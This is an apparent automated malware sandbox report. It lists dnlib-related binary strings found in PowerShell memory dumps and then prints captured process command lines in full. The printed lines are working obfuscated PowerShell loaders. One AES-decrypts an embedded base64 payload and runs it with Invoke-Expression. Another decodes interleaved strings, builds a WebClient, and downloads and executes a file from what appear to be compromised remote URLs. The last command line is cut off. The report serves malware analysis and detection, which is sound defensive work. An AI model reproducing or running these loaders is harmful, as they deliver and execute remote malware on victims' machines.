            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\dnlib-fuscator-master win7\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000015.00000002.890425117.00000000077B5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e 